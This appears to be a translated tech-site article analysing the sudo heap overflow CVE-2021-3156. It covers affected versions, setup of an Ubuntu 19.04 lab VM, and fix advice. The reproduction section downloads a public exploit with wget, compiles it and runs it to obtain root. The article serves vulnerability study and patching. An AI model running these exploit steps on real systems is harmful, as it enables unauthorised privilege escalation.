Shulou(Shulou.com)05/31 Report--

This article to share with you is about Sudo overflow vulnerability CVE-2021-3156 example analysis, Xiaobian think quite practical, so share to everyone to learn, I hope you can read this article after some harvest, not much to say, follow Xiaobian to see it.

0x00 Introduction

Sudo is a linux system administration directive that allows system administrators to have regular users execute some or all of the root commands, such as halt, reboot, su, etc. This not only reduces root login and administration time, but also improves security. Sudo is not a replacement for shell, it is command-oriented.

0x01 Vulnerability Overview

On January 26, 2021, sudo was exposed to a heap-based buffer overflow vulnerability (CVE-2021-3156, named Baron Samedit) that could lead to local privilege escalation.

When executing commands on Unix-like operating systems, non-root users can use the sudo command to execute commands as root. Heap buffer overflow due to sudo incorrectly escaping backslashes in arguments allows any local user (whether in sudoers file or not) to gain root privileges without authentication and without knowing the user password.

0x02 Scope of influence

sudo 1.8.2 - 1.8.31p2

sudo 1.9.0 - 1.9.5p1

0x03 Environment construction

This environment uses ubuntu version 19.04

1. Official download address: old-releases.ubuntu.com/releases/19.04/

2. Use VMware virtual machine to install the minimum installation. (The specific installation process is Baidu)

0x04 Bug recurrence

1. Enter sudo -version in the terminal to view sudo version, and use whoami to view current user.

2. Use exp on GitHub to exploit vulnerabilities, use wget or git to download

wget https://hub.fastgit.org/blasty/CVE-2021-3156/archive/main.zip

unzip main.zip

3. Enter the decompressed directory and compile it into an executable file using make.

cd CVE-2021-3156-main/

make

4, after the execution of the compiled file plus ubuntu execution, you can see that it is already root permission (Debian system can also be used)

./ sudo-hax-me-a-sandwich ubuntu

0x05 Repair suggestions

At present, the official has fixed this vulnerability in the new version 1.9.5p2 of sudo. Please upgrade the version affected as soon as possible for protection.

Download address: www.sudo.ws/download.html

The above is an example analysis of Sudo overflow vulnerability CVE-2021-3156. Xiaobian believes that some knowledge points may be seen or used in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.